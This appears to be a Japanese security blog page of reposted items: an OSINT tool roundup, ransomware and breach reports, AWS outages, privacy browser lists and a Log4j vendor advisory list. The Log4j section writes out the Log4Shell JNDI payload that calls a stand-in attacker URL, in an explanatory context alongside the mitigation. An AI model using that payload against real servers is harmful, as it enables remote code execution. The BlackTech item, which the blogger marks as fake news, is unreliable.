週刊OSINT 2021-45号 / WEEK IN OSINT #2021-45(転載)

 

Week in OSINT #2021-45

今号も、役に立つヒントや便利なツールをご紹介します。

忙しくしていると時間が経つのが早いですね。リラックスする時間がほとんどありませんでしたので、もっと静かな時間が近づいていることを願っています。今回は、メールやDMで送られてきたヒントなど、いくつかの素晴らしいコンテンツを確保することができました。ありがとうございます。本当に助かります。

  • Wayback Search
  • Online Privacy Tips
  • Sterra
  • Trace Labs Guide

ツール: Wayback Search

Lorenzo Romani氏は、Internet ArchiveのWayback Machineからすべてのコンテンツを簡単にダウンロードできる小さなツールを作成しました。このツールを起動してドメイン名を入力すると、検索してすべてのコンテンツをダウンロードしてくれます。ちょっとした注意点があります。サブフォルダを指定することはできず、ベースとなるドメインのみを指定します。すべてをダウンロードした後は、小さな検索ツールを使って、ダウンロードしたコンテンツの中から特定のキーワードを見つけることができます。このツールにはPython3版とGo版がありますので、使いやすい方を選んでください。


小技: Online Privacy Tips

Twitterユーザーの「Maderas」は、オンラインプライバシーに関するリソースの小さなリストをツイートしました。このリストは、Googleを自分の生活から追い出したいと思っている人のために、さまざまなリソースを集めたGitHubのレポから始まります。また、ブラウザ、検索エンジン、VPN比較シートなどの情報も掲載されています。この情報の中には、2019年12月に最終更新されたとする2番目のVPNシートのように、古いものもあることに注意してください。しかし、それでもこの情報は、あなたが完璧なプライバシーを意識したセットアップを見つけるのに役立つ貴重なものです。

注:ブラウザの自動更新をオフにする方法があります。ただし、セキュリティアップデートも受け取れなくなりますのでご注意ください。猜疑心を持つか、安全を確保するか、賢明な選択をしてください。

ツール: Sterra

Sterraは、Twitterユーザーの「аэт」が開発した新しいツールで、これはInstagram Helperツールの代わりになる便利なツールのようです。この拡張機能ではアカウントを作成する必要があるため、多くの人が(私のように)このツールをやめてしまいました。このパイソンスクリプトはその穴を埋めるもので、フォロワーやフォローしているアカウント、相互フォロワー、そしてバイオグラフィーで得られるすべての情報をダウンロードすることができます。時間の都合上、私自身はこのツールをテストしていませんので、ご自身の責任でお使いください。また、Instagramのスクレイピング制限はかなり厳しいので、失っても構わないアカウントを使うようにしてください。

記事: Trace Labs Guide

osintme.comのブログでは、Trace LabsのCTFガイドを紹介しています。これまでにもいくつかのガイドはありましたが、誰かの個人的な経験やヒントを読むのはいつでもいいものです。CTFに関してだけでなく、一般的にも常に学ぶべきことがあります。準備、心構え、調査そのものに関する素晴らしいヒントです。今回も貴重な情報を得ることができました。

VAIOに楽天モバイルのSIMを入れてみる


以前購入したVAIOに、同じく依然申し込んだ楽天モバイルのSIMを入れてみた。

元々VAIO購入時に1年間有効のSIMがついていたので、バックアップがてらそれを使っていたのだが、1年の有効期限を迎え、PCから直接通信デバイスがあることが非常に便利に思えてきた。

一方、楽天モバイルは1年間無料キャンペーン時に申し込んだものだが、意外に使い勝手が良く、VAIO SIMの有効期限切れとともにVAIOに楽天モバイルのSIMを入れて使ってみることにした。

楽天モバイルのSIMをノートパソコンに突っ込んで使う事例はネットに出ていたが、意外にも全くつながらない。

んで、参考になったのは下記のサイト

楽天モバイルUN-LIMITをVAIO S13 LTE搭載モデルで使う方法アーカイブ

特に、下記部分

ーー

そういえば、以前SIMカードを入れ替えた際も、SIMを入れ替えても旧SIMカードの情報を保持して繋がらなかった事を思い出しました。

この手順で以前解決したので試しに行ってみました。

「旧SIMカードを挿入する」→「接続できている事を確認」→「シャットダウン」→「旧SIMカードを抜く」→「SIMなしで起動」→「シャットダウン」→「楽天モバイルSIMカードを挿入」→「起動」→ なぜか繋がる

ーー

実際は上記では復旧しなかったのだが、パソコンの設定に関しては意外にも上記のようなアナログな部分が残る。

そこでもう少し手順を増やしてやってみる

「旧SIMカードを挿入する」→「接続できている事を確認」→「SIMロック解除(VAIO SIMは容量制限があり、必要時にのみ接続するため、SIMにパスコードを設定していた)」→「APN削除」→「シャットダウン」→「旧SIMカードを抜く」→「SIMなしで起動」→「シャットダウン」→「楽天モバイルSIMカードを挿入」→「起動」

これで無事解決。

通信速度も悪くない。

続いてモバイルホットスポットの設定に進む。

ここで新たな問題発生。

設定を有効にしようとすると、「接続を共有するには、最初にこの機能を携帯データ通信プランに追加する必要があります。」と表示される。



日本語のマイクロソフト(マイクソ)コミュニティにも同じ問い合わせがあったが、クソみたいな回答しかなかった。

ネットの世界をいろいろ徘徊した結果、英語のマイクソのコミュティで関連する記事を見つけたが、どうもOSのかなり深いところをいじくる感じである。



 


Googleの新しいフライト検索ハック / Google’s New Flight Search Hack(転載)


Google’s New Flight Search Hack:

航空券を検索する際に、長年にわたって利用してきたのが、現在はGoogleが所有しているITA Matrixでした。これはデモサイトで、実際には予約はできませんでした(ただし、検索結果を利用して予約できるようにするハッキングされたツールはありました)。ITA Matrixは、希望する正確な運賃や経路、航空会社を指定して、旅行期間やその他の機能に基づいて絞り込むことができる、最も迅速で最も強力な検索方法です。

バックエンドは古く、メンテナンスもされていませんが、何人かのGooglerが新しい技術に移植して存続させています。これがその新しいサイトです。もちろん、ほとんどの人はGoogle Flightsを使うでしょう。


実録:ランサムウエアに感染するとこうなる


プリンターが止まらない 戦慄のランサムウエア 被害企業が語った|サイカルジャーナル|www3.nhk.or.jp/news/special/s…

プリンターから、突如、大量の紙が出てきた。止まらない。

紙には「あなたの会社のデータは盗まれ、暗号化された」という脅迫のメッセージ。

ことし8月、日本国内の企業で実際に発生した、身代金要求型のサイバー攻撃だ。

これ以上、被害を増やさないためにと、その企業が取材に応じてくれた。

いま何が起きているのか。

地方の産業を支える企業にサイバー攻撃

東北地方にある中堅の食品加工会社。

ことし8月、システム担当者の男性が、出勤して異変に気づいた。


パソコンの画面をクリックして、ファイルを調べると、取り引きデータのファイルがすべてLockbitというファイル名に書き換えられていた。


クリックしても「問題が発生しました」と表示され、開くことができない。


その直後、複数の部署から、次々と連絡が入った。

「取引などに使用する基幹システムが使えない」

対応に追われていた昼過ぎ、さらに異様な事態が起きた。

突然、プリンターが、大量の印刷物を吐き出し始めたのだ。


「あなたの会社のデータは盗まれ、暗号化された。このままだと闇サイトに公開されることになる」

ハッカー集団からの犯行声明。脅迫のメッセージだった。

印刷物は、社内のほかの拠点のプリンターからも一斉に出てきた。

システム担当者は、ただちに、プリンターの電源を切るよう、各部署に指示した。

プリンターは、ふだんインターネットには直接つながっていない、いわゆるイントラのプリンターだった。

この会社では、警察のアドバイスに従い、ハッカー集団とは、やりとりをしないことにした。

その後、更新していなかったソフトウエアを狙われた可能性があることが分かった。

システムは今も復旧していない。

取引の処理をすべて手入力で行うなど業務の負担は格段に増えている。

ちなみに2021年8月にランサムウエアの被害が発生した日本の組織は下記となる。

いずれかの組織が取材に応じてくれたのだろう。


【フェイクニュース】BlackTechグループが中国内企業へのAPT攻撃を分析(転載)~外国語ソースも重要だが、ニセ情報の存在も認識しなければならない~


 瑞星:BlackTech组织对国内企业APT攻击分析 

最近、ライジングスレットインテリジェンスセンターが中国内企業に対するサイバー攻撃をキャッチしました。 解析の結果、この事件の攻撃者はBlackTech組織であり、フィッシングメールで漢字のマクロ文書をターゲットに配信し、それによってユーザーにクリックと実行を誘惑し、ユーザーデータのアップロードとトロイの木馬のダウンロードを目的とした不正プログラムをリリースすることが判明したのです。 現在、Rising ESM Anti-Virus Terminal Security Protection Systemなどの製品は、この攻撃によるウイルスを遮断し、チェックすることができるので、ユーザーは対応するリスクを回避することができます。


BlackTechは、少なくとも2010年以降、標的に対してサイバー攻撃を仕掛けている脅威集団で、Tatsuya Daitoku、yber Defense Institute、TEMP.Overboard、T-APT-03などとも呼ばれ、情報の窃盗やスパイ活動を中心に活動しているそうです。 BlackTechグループは、中国、日本、台湾、中国香港などの東アジアから、建設、金融、政府、医療、メディアなどの分野での攻撃をターゲットにしています。

Risingのセキュリティ専門家によると、今回の攻撃でRisingがキャプチャしたサンプルは「Yu Tongcai Weekly 1025-1031.xlsm」というマクロ文書で、さらに検索すると「2021-10 給与におけるCPF問題に関する協議」という別の名前を持っていることが判明したとのことです。 xlsmなので、中国語名から、国内企業を狙った攻撃と判断しました。 この文書には、マクロコードによって表示・非表示が制御される2つのワークシートがあり、ユーザを騙してマクロコードを積極的に実行させ、異なるワークシートを表示させ、マクロコードに格納された悪意のあるプログラムをハードコードで解放することで、悪意のある動作を隠すことを目的とした攻撃であると考えられます。

プライバシーとOSINTのための検索エンジンとブラウザの選択 / 30 search engine & browser choices for privacy and OSINT(転載)


 30 search engine & browser choices for privacy and OSINT

今回は、デジタル・プライバシーに焦点を当てます。私たちのオンライン活動の大部分は、ウェブブラウザや検索エンジンに依存しているため、ウェブブラウザや検索エンジンの話ほどぴったりなものはありません。

ここで、プライベートブラウジングに関する一般的な神話の1つである「Incognito / Private Browsing」モードについて説明します。

これらは全く持ってプライベートではありません。

どちらのモードであっても、お客様が閲覧するウェブサイトやアクセスするサービスは、お客様のIPアドレスを読み取り、お客様のブラウザのフィンガープリントを取得し、お客様のユーザーエージェントを認識します。

ウェブサイトからのマルウェアのドライブバイダウンロードなど、オンラインの脅威に対する保護機能は、通常のブラウジングモードと同様です。

最後に、あなたがオンラインで何をしているのか、ISPはまだ見ることができます。

以下に挙げる検索エンジンやブラウザは、必ずしもこれらの懸念事項のすべてに対応しているわけではありません。例えば、ISPのスヌーピングの問題は、VPNを使用することで解決する必要があります(その理由については、1年以上前に書きました)。

これらのあまり知られていないオプションを選択する際に重視したいのがプライバシーであろうとOSINTであろうと、以下の中から十分に選択することができます。

検索エンジン

アルファベット順に掲載されているので、良いもの、便利なものという意味では順不同です。

  • Brave Search – https://search.brave.com/ – 人気ブラウザ「Brave」と連動した、プライバシーに配慮した検索エンジンのベータ版です。
  • DuckDuckGo –  https://duckduckgo.com/ – おそらく、最もよく知られている、プライバシー重視の検索エンジンです。
  • Disconnect Search – https://search.disconnect.me/ – 透過的なプライバシーポリシーを持つDuckDuckGoが提供しています。
  • eTools CH – https://www.etools.ch/ – プライバシーを重視した検索エンジンのアグリゲーターで、現在17の検索エンジンが参加しています(その多くはこのリストに掲載されています)。
  • Gibiru – https://gibiru.com/ – アカウント不要、クッキー不要、検索ログ不要、閲覧履歴不要です。
  • Gigablast – https://www.gigablast.com/ – ニュース、画像、ディレクトリなどのプライベートサーチエンジン。
  • Intelligence X – https://intelx.io/ – 多目的でありながら、ウェブインフラからデータリークまで、あらゆる分野に特化した検索エンジンです。しかし、一般的なGoogleのような使い方には適していません。
  • Lukol – https://www.lukol.com/ – Googleカスタム検索による匿名での閲覧。Google検索を基本的なドライバーとして使用していますが、アカウントや登録は必要ありません。
  • MetaGer – https://metager.org/ – 非営利のNGOが運営する検索エンジン。複数の検索エンジンの結果を組み合わせることで、検閲から守ります。
  • Mojeek – https://www.mojeek.com/ – "escaping the big tech "の独立した検索エンジン。
  • Oscobo – https://www.oscobo.com/ – ユーザーの詳細情報を収集しない、専用のブラウザもあります。
  • Privado – https://www.privado.com/ – privacy focused search engine with a dedicated blog.
  • Private SH – https://private.sh/ – 暗号化された検索クエリとプロキシの使用により、プライバシーを実現しています。
  • Quant – https://www.qwant.com/ – EUベースの検索エンジンで、ユーザーの活動を追跡しません。広告は表示されるかもしれませんが、ランダムに表示されます。
  • Searchencrypt – https://www.searchencrypt.com/ – 15分後に閲覧履歴を削除します。
  • SearX – https://searx.space/ – オープンソースの検索エンジンで、ユーザーが作成したローカル検索エンジンのリストを提供し、どこで何がホストされているか、どのように運営されているかについての情報を提供します。
  • Startpage – https://www.startpage.com/ – トラッカーや広告ターゲティングをブロックし、ユーザーのIPアドレスをサーバーから削除する検索エンジンです。定期的に更新されるプライバシーブログを運営しています。
  • Swisscows – https://swisscows.com/ – プライバシーに配慮し、成人向けコンテンツをブロックするフィルターが組み込まれているため、家族に優しいことが特に強調されています。

ブラウザー

新しいブラウザを使い始める前に、そのプライバシー設定がどのようになっているかをテストしてみるのも良いでしょう。そのためには、次の2つのサイトをお勧めします。

ブラウザについては、Safari、Firefox、Chromeのようなわかりやすいものはあえて挙げていません(後者2つはOSINTに最適で、多数の便利な拡張機能があります)。

どのブラウザも同じではありませんが、以下のリストの多くは、特定の目的のために使用することができます。

  • Brave – https://brave.com/ – 非常に優れたプライバシー機能を備えたChromiumベースのブラウザで、ブラウザネイティブの暗号通貨ウォレットを内蔵した追加機能を備えています。
  • Epic Privacy Browser – https://www.epicbrowser.com/ – 印象的なプライバシー保護とセーフガードのリストを持つブラウザです
  • Freenet – https://freenetproject.org/pages/download.html – Webサイトやピアツーピアリソースの分散型ネットワークを閲覧するためのニッチなソフトウェア群であり、メインストリームのブラウザとは異なります。
  • Ghost Browser – https://ghostbrowser.com/  – 様々なブラウジングセッションのための複数のユーザーID、ワークスペースやプロキシを提供するブラウザです。無料版と有料版があります。
  • Opera – https://www.opera.com/ – チャット機能や無料のVPNサービスを内蔵した、プライバシーに配慮したブラウザです。
  • Oscobo – https://www.oscobo.com/ctnt.php?c=download – 上述の検索エンジン「Oscobo」のネイティブブラウザです。
  • Osirt Browser – https://osirtbrowser.com/ – 厳密にはOSINTに焦点を当てたブラウザで、自分の仕事を記録するためのものです。2022年には大幅なアップグレードが予定されており、さらに面白いものになるはずです。
  • Tor – https://www.torproject.org/download/ – デジタル・プライバシーに興味のある方には、ここで紹介する必要はありません。プライベートブラウジングの真の先駆者です。
  • Vivaldi – https://vivaldi.com/ – 分割画面のタブや内蔵メールクライアントなどの革新的な機能を備えた、プライバシー重視のブラウザです。
  • Waterfox – https://www.waterfox.net/ – 様々なChromeやFirefoxの拡張機能をサポートしているとのことですが、テレメトリやトラッキングはありません。
  • Yacy – https://yacy.net/demonstration_tutorial_screenshot/ – 厳密にはブラウザそのものではなく、ローカルで動作し、ユーザーが設定可能な検索エンジンです。多数のオプションが用意されているため、ブラウザのような感覚で使用することができます。

日本通運のシンガポール現地法人に不正アクセス、情報流出の可能性(転載)


[PDF] 当社シンガポール現地法人における IT システムへの不正アクセスによる情報流出の可能性ついて 日本通運株式会社
nittsu.co.jp/info/pdf/20211…

日本通運株式会社は2021年12月9日、同社のシンガポール現地法人のITシステムへの不正アクセスによる情報流出の可能性について発表した。

これは11月14日に、シンガポール現地法人で運用するサーバとパソコンの一部に外部から不正アクセスがあったことを確認し、その後、一部情報が外部に流出した可能性を確認したというもの。

シンガポール現地法人は現時点で、不正アクセスのあった機器のネットワークからの遮断や被害拡大防止のための初動措置を終え、、関係機関への報告を行っている。現在は外部の専門機関も起用し、障害の復旧及び影響を受けた可能性のある情報の特定を進めている。

なお、12月9日時点の調査では、日本を含む他の国や地域におけるシステムへの影響は確認されていない。

【悲報】AWS再び落ちる / AWS down again, outage impacts Twitch, Zoom, PSN, Hulu, others(転載)~クラウドを採用するということは、障害発生時に指をくわえて見守るしかないことを覚悟せよ~


AWS down again, outage impacts Twitch, Zoom, PSN, Hulu, others:

Amazon AWSで障害が発生し、Twitch、Zoom、PSN、Xbox Live、Doordash、Quickbooks Online、Huluなど、多数のオンラインサービスに影響が及んでいます。

AWSのステータスページによると、この継続的な障害は2021年12月15日午前7時43分(PST)頃に始まり、US-WEST-1およびUS-WEST-2リージョンに影響を及ぼしているとのことです。

報告によると、インターネット接続の大きな問題を引き起こし、オンラインプラットフォームやウェブサイトの長いリストをダウンさせています。

AWSのエンジニアは、この障害の背後にある根本的な原因への対処に取り組んでおり、すでに接続性を回復するための措置を講じたと述べています。

"我々はUS-WEST-2リージョンへのインターネット接続の根本原因を特定し、接続性を回復するための措置を講じました。"とAWSのステータスページには書かれています。

"ここ数分でインターネット接続に若干の改善が見られましたが、引き続き完全な復旧に向けて取り組んでいます。"

今回のAWS障害で影響を受けたオンラインサービス


その結果、Netflix、Roku、Amazon Primeでのストリーミング再生に直ちに影響が出ました。カメラに接続できなくなったというユーザーの報告によると、Ringデバイスもダウンし、アクセス不能になったとのことです。

アマゾンの配達員も、荷物のスキャンや配達ルートへのアクセス、今後のスケジュールの確認に必要な社内アプリにアクセスできなかったと述べています。

AWSが後に説明したように、そのインシデントは、"メインAWSネットワークでホストされているAWSサービスの1つの容量を拡張する自動化された活動 "が原因で、"内部ネットワークとメインAWSネットワーク間のネットワークデバイスを圧倒する大規模な接続活動のサージが発生した "ものでした。

これらの停止は、2020年11月にUS-EAST-1リージョンに影響を与えた大規模インシデントを含む、2011年以降の他の複数の同様のインシデントに続くものであるため、特別な出来事ではありません。

当時、ストリーミングデータをリアルタイムで処理するAmazonのKinesisサービスに問題が発生し始め、多数のサイトやオンラインプラットフォームがオフラインになりました。

その1年前の2019年9月には、AWSのノースバージニアUS-EAST-1データセンターを襲った停電により、ファイルを復元するためのバックアップが機能していなかったAmazonのすべての顧客がデータ損失を被った。

Javaのログ出力ライブラリ「Apache Log4j」に存在するリモートから悪用可能な脆弱性(CVE-2021-44228)


Log4j: List of vulnerable products and vendor advisories:

2021年12月9日、Apache Log4jのロギング・ライブラリに重大な脆弱性があるというニュースが流れ、概念実証済みの脆弱性が出現しはじめました。

Log4jは、オープンソースのJavaロギングフレームワークで、Apache Logging Servicesの一部として、世界中のベンダーの様々なアプリケーションでエンタープライズレベルで使用されています。

Apacheは、Log4ShellまたはLogJamとも呼ばれる、現在CVE-2021-44228として追跡されている最大深刻度の脆弱性に対処するために、Log4j 2.15.0をリリースしました。

CloudflareとCisco Talosのデータによると、大規模な悪用が始まったのは、悪用コードが自由に利用できるようになってからですが、今月初めから攻撃が検出されています。

Log4Shellの欠陥は、11月24日にAlibabaのクラウドセキュリティチームによって報告されましたが、一部の攻撃者がなぜこれほど早く悪用できたのかは不明です。

Cybersecurity and Infrastructure Security Agency(CISA)のディレクターであるJen Easterly氏は、Log4Shellの脆弱性に関する土曜日の声明で、同機関が民間および公的セクターのパートナーと協力してこの問題に対処していると述べています。

Log4Shell は、Java Naming and Directory Interface (JNDI) インジェクションで、認証されないリモートでのコード実行を可能にします。攻撃者は、ブラウザのユーザーエージェントを次の形式の文字列に変更することで、これを利用することができます。

${jndi:ldap://[attacker_URL]}

この文字列は、被害者のWebサーバーのログに残り、Log4jライブラリがそれを解析すると、攻撃者のURLへのコールバックやリクエストを強制的に実行します。攻撃者は、この文字列を使用して、脆弱なマシンにエンコードされたコマンドやJavaクラスを渡すことができます。


CISAは本日、脆弱性の深刻さとその悪用が容易であることから、Log4Shell攻撃に対する防御を設定するための企業向けガイダンスを発表しました。同機関が推奨するのは、「利用可能なパッチを直ちに適用すること」であり、このプロセスに優先順位をつけることです。

パッチ適用が不可能な場合、同機関は以下の変更を推奨しています。

アプリケーションを起動する Java Virtual Machine コマンドに -Dlog4j2.formatMsgNoLookups=True という文字列を追加して log4j2.formatMsgNoLookups を true に設定する。

この場合、メッセージのフォーマットをルックアップに依存している場合、システムのロギングに影響を与える可能性があるという注意点があります。また、この緩和策はバージョン2.10以降にのみ有効です。

Log4Shellの詳細が判明した直後から、ベンダー各社は自社製品が影響を受けるかどうかの調査を開始し、その結果について情報を提供しています。

Amazon

アマゾンは、いくつかの製品をアップデートし、脆弱性のないバージョンのLog4jコンポーネントを使用するようにし、他の製品もアップデート中であるか、近い将来に新しいバージョンをリリースする予定であると発表しました。

同社は、OpenSearch、AWS Glue、S3、CloudFront、AWS Greengrass、API Gatewayなどの影響を受けるサービスに関する詳細を発表している。

Atlassian

同社の評価によると、オンプレミス製品のデフォルト設定では、悪用されやすい脆弱性はないと考えています。

JMS Appender 機能を有効にするためにデフォルトのログ設定 (log4j.properties) を変更すると、Jira Server & Data Center, Confluence Server & Data Center, Bamboo Server & Data Center, Crowd Server & Data Center, Fisheye, Crucible など一部の製品でリモートコード実行のリスクがもたらされる可能性があるそうです。

Broadcom

同社は、Log4jの脆弱性の影響を受ける複数のシマンテック製品について、緩和策とナレッジベースの記事を公開しました。CA Advanced Authentication、Symantec SiteMinder (CA Single Sign-on)、VIP Authentication Hub、Symantec Endpoint Protection Manager (SEPM)が含まれる。

Cisco

シスコは、Log4Shellの影響を受ける自社製品のリストと、12月14日から一部の製品にパッチを適用するカレンダーを公開しました。

影響を受ける製品は、以下のような様々なカテゴリーに分類されます。
  • ネットワークおよびコンテンツセキュリティ機器(Identity Services Engine、Firepower Threat Defense、Advanced Web Security Reporting Application)
  • コラボレーションとソーシャルメディア(Cisco Webex Meetings Server)
  • ネットワーク管理およびプロビジョニング(Cisco CloudCenter Suite Admin、Data Center Network Manager、IoT Control Center、Network Services Orchestrator、WAN Automation Engine)
  • エンタープライズ ルーティングとスイッチング(Cisco Network Assurance Engine、Cisco SD-WAN vManage)
Citrix

調査は現在も進行中であり、一部の製品については状況が変わる可能性がありますが、シトリックスは、Log4Shellの脆弱性がある製品としてリストアップしていません。

ConnectWise

同社のクラウドサービスであるPerchが、「潜在的な脆弱性を持つ」サードパーティーコンポーネントに依存していることが判明した、とConnectWise社のアドバイザリーには書かれています。

脆弱性のあるサードパーティは、ConnectWiseのStratoZenソリューションで使用されているFortiGuardのFortiSIEMと判明し、同社はホスティングされているStratoZenサーバーへのアクセスを一時的に制限するよう促されました。現在では、ほとんどのサービスへのアクセスが回復しています。

cPanel

フォーラムのスレッドによると、cPanelのSolrプラグインが存在するインスタンスのみが影響を受け、悪用される可能性があるが、ローカルにのみ存在するとのことです。

あるスタッフは、Log4Shellに対する緩和策を含むアップデートがcpanel-dovecot-solrパッケージに用意されていることを発表し、さらに安心感を与えてくれました。

Debian

Debian 9 (Stretch), 10 (Buster), 11 (Bullseye), 12 (Bookworm) にセキュリティアップデートとして、パッチを適用した Log4j パッケージが追加されました、と勧告があります。

Docker

Docker Officialイメージの12個に、脆弱性のあるバージョンのLog4jライブラリが使用されていることが判明しています。couchbase、elasticsearch、logstash、sonarqube、solrが含まれる。

Dockerは、「これらのイメージに含まれるLog4j 2を利用可能な最新バージョンに更新中」であり、他の理由でイメージに脆弱性がない可能性があると述べている。

FortiGuard

同社からのアドバイザリーでは、約12の同社製品に脆弱性があるとされており、そのうち4つの製品についてはすでに修正または緩和措置が展開されているとのことです。

FortiGuardは、FortiSIEM、FortiInsight、FortiMonitor、FortiPortal、FortiPolicy、ShieldXなど他の製品の修正プログラム適用時期について、アドバイザリを更新すると発表している。

F-Secure

エフセキュアのいくつかの製品のWindows版とLinux版の両方がLog4Shellの影響を受けています。Policy Manager (Policy Manager Server コンポーネントのみ)、Policy Manager Proxy、Endpoint Proxy、および Elements Connector です。

同社は、この問題を修正するための管理者向けセキュリティパッチを作成し、それを展開するためのステップバイステップの手順を提供しています。

Ghidra

NSAが提供するオープンソースのリバースエンジニアリングツールは、バージョン10.1へのアップデートを受け、Log4jの依存関係を脆弱性のないイテレーションにアップグレードしています。

IBM

IBMのLog4Shellに関するアドバイザリによると、Admin ConsoleとUDDI Registry Applicationコンポーネント経由で、WebSphere Application Serverバージョン9.0と8.5のみが脆弱性の影響を受け、この問題は解決されているとのことです。

Juniper Networks

ネットワーク会社は、同社の4つの製品が影響を受けることを明らかにした。Paragon Active Assurance、Paragon Insights、Paragon Pathfinder、Paragon Plannerの4製品に影響があることを明らかにしました。

評価は継続中ですが、現段階ではさらに6つの製品が影響を受ける可能性があります。JSAシリーズ、Junos Space Management Applications、Junos Space Network Management Platform、Network Director、Secure Analytics、Security Director (Security Director Insightsは除く)

McAfee

同社はまだ評価を完了しておらず、12製品を審査中であり、関連情報が入手でき次第、アドバイザリーを更新する予定です。

MongoDB

Log4Shellに対してパッチを適用する必要があるのはMongoDB Atlas Searchのみであると、本日更新されたアドバイザリーで同社は指摘しています。

開発元は、パッチを適用する前に悪用された証拠や侵害の指標を発見しなかったと付け加えています。

Okta

Oktaは、Log4Shellの脆弱性によるリスクを軽減するため、Okta RADIUS Server AgentおよびOkta On-Prem MFA Agentのアップデートをリリースし、お客様にアドミンコンソールからの修正プログラムの適用を強く推奨しています。

Oracle

オラクルによると、「いくつかの」自社製品が、どの製品が、いくつの製品が、脆弱性のあるバージョンのLog4jコンポーネントを使用していると公表していない。

同社は、顧客にMy Oracle Support Documentを紹介し、提供されるアップデートを "できるだけ早く "適用するよう強く推奨するセキュリティ警告を発表した。

OWASP Foundation

先日のアドバイザリで、Zed Attack Proxy (ZAP) ウェブアプリのスキャナ 2.11.1 以下のバージョンに、脆弱な Log4j コンポーネントが使用されていることが明らかになりました。

Red Hat

Red Hat は、複数の Red Hat 製品のコンポーネントが Log4Shell の影響を受けることを金曜日に明らかにし、利用可能になり次第、アップデートを適用するよう顧客に強く推奨しています。

勧告に記載されている製品は、Red Hat OpenShift 4および3.11、OpenShift Logging、OpenStack Platform 13、CodeReady Studio 12、Data Grid 8、Red Hat Fuse 7である。

AWSで障害、多数のウェブサイトやアプリに影響(転載)~クラウドを採用するということは、障害発生時に指をくわえて見守るしかないことを覚悟せよ~


アマゾンで障害、多数のウェブサイトやアプリに影響:

Amazon Web Services(AWS)で米国時間2021年12月7日に障害が発生し、複数のウェブサイトやアプリを一部のユーザーが利用できない状態になった。AWSでは、「Disney+」「Robinhood」「Barclays」「Slack」などのサービスに処理能力やストレージを提供している。今回の障害では、ワシントンDCやニューヨーク市を含む米国東海岸の地域に障害発生の報告が集中していた。

障害に関するデータを収集するDown Detectorには、7日の米国東部時間正午前の時間帯に、AWSを利用するサイトの障害報告が1万1000件以上まで急増している様子が示されている。

システムアクティビティーをモニタリングするためのAWSのステータスページには、同社のバージニアにある施設で発生した問題がUS-EAST-1リージョンに影響を与えていると記載されている。その問題は、企業がウェブサイトやアプリを運用するために使用する、複数のAWS製品に影響を与えたようだ。

「根本原因を特定済みで、復旧に向けて鋭意対応している」と更新情報には記されている。

Down Detectorには、数十件のサービスの障害報告も示されているが、そのすべてがAWSの障害が始まった時間から発生している。Amazonそのものに加えて、傘下のサービスである「Ring」「Prime Music」「Alexa」「Chime」や、TicketMaster、Google、McDonald's、Venmo、Cash App、そして米社会保障局のオンラインアカウント用ポータルであるMy Social Securityなども、7日の午前11時頃から障害に見舞われている。

ー2021/12/15追記ー

AWS、12月7日の大規模障害について詳細を報告アーカイブ

みずほFG システム障害頻発で首脳陣一新・・・(転載)~ITを理解できない人が会社を経営するとこうなる~

みずほFG システム障害頻発で首脳陣一新…ついに消滅した「興銀の栄光」

官界通(以下=官):みずほフィナンシャルグループ(FG)の佐藤康博会長(69)と坂井辰史社長(62)が、度重なるシステム障害で利用者に不便と不安を与えた責任で、ようやく辞任を決めたな。2人はみずほの母体の一つ、旧・日本興業銀行の出身。ある興銀OBが「これで、栄光の興銀の歴史は終わる」と嘆いていた。

政界通(同=政):責任は明確だったのに、なぜ体制一新が遅れたの?

財界通(同=財):2人に「辞任は当然」とする一般の感覚が欠けていたからだろう。

官:興銀出身という点が、関係しているのか?

財:そうだと思う。興銀は明治時代に産業振興のために設立された国策銀行で、債券を発行して得た資金で融資を拡大。とくに鉄鋼、造船、化学、電力など巨大な装置を必要とする重工業の発展に貢献した。戦後も金融債の「ワリコー」「リッキー」が富裕層の人気を集め、2002年4月に経営統合でみずほコーポレート銀行に衣替えするまで存在感を維持した。

官:そう、「財界の鞍馬天狗」の異名を持つ中山素平氏をはじめ歴代頭取は、海外や財界でも活躍した。

政:それに比べ、佐藤氏や坂井氏は小粒で、巨大銀行の舵取りを誤ったということか。

■リテールのあるメガのトップは無理だった

財:そこまでは言わないが、大企業金融の世界で育った人が膨大な個人や中小零細の業者をお客に持つメガバンクグループのトップを務めることに、無理があった。数字優先で、統合の相手だった富士銀行系や第一勧業銀行系の支店を減らし、システム要員らの削減へ猛進した。

政:それが、障害頻発の遠因か。

官:金融庁が出した業務改善命令にも、その視点がある。

財:辞任は2人だけでなく、傘下のみずほ銀行の藤原弘治頭取(60)も辞める。ただ、藤原氏の後任は富士出身の加藤勝彦副頭取(56)に決まったが、FGトップは未定だ。

官:金融庁の雰囲気では、興銀出身者が3代続けて就任する可能性はないな。

財:当然だ。今回だけでなく、もう二度とないかもしれない。


【参考】

みずほ銀行及びみずほフィナンシャルグループに対する行政処分について (バックアップ


CSIRTマテリアル(構想フェーズ・構築フェーズ・運用フェーズ)リニューアル



hiro_ retweeted:
CSIRTマテリアル(構想フェーズ・構築フェーズ・運用フェーズ)を更新しました。どうぞご利用ください。^YK jpcert.or.jp/csirt_material…


CSIRT(シーサート: Computer Security Incident Response Team) とは、組織内の情報セキュリティ問題を専門に扱う、インシデント対応チームです。

近年の組織 (企業) の IT 利用の拡大に伴い、情報セキュリティ対策は組織にとって重要な問題となってきています。高度に複雑化し、かつインターネットを介して大容量のデータを瞬時に、しかも容易に世界中とやり取りできる IT システムの利用が一般的になったことで、単に「現場 = システム管理者」の頑張りだけで済む問題ではなくなってきています。例えば、情報システムがコンピューターウイルスに感染してしまったために、顧客の個人情報が世界中にばら撒かれてしまったといった事態を考えてみれば、情報セキュリティの問題が、もはやシステム管理者だけの問題ではなく、経営層が積極的に関与しなければならない問題であることは容易に想像できると思います。このような中で、組織の情報セキュリティ対策として注目されているのが、情報セキュリティの問題を専門に、ただし組織全体の視点から取り扱うCSIRTの構築です。

CSIRTマテリアルは、組織的なインシデント対応体制である「組織内CSIRT」の構築を支援する目的で作成したものです。これから自組織内にCSIRTを構築しようと考えている組織の方が、それまでのインシデント対応経験をもとに、既存の体制を整理したり、見直したりしてCSIRTの構築に繋げる際の参考として頂くことを意図しています。一連の資料では組織内CSIRTが一般的に備えるべき機能や能力等について説明していますが、すべての組織内CSIRTがそれらを達成しなければならないというものではありません。それぞれの組織の状況に応じた適切なCSIRTの形があり、本資料がそれを見つける際の助けとなれば幸いです。


NHK子会社社員を懲戒解雇 2,800万円分チケット換金、私的流用(転載)~経理担当が裏切らないとは限らない。内部不正対策の観点からもゼロトラストの発想が必要~

経理担当が裏切らないとは限らない

NHK子会社社員を懲戒解雇 2800万円分チケット換金、私的流用

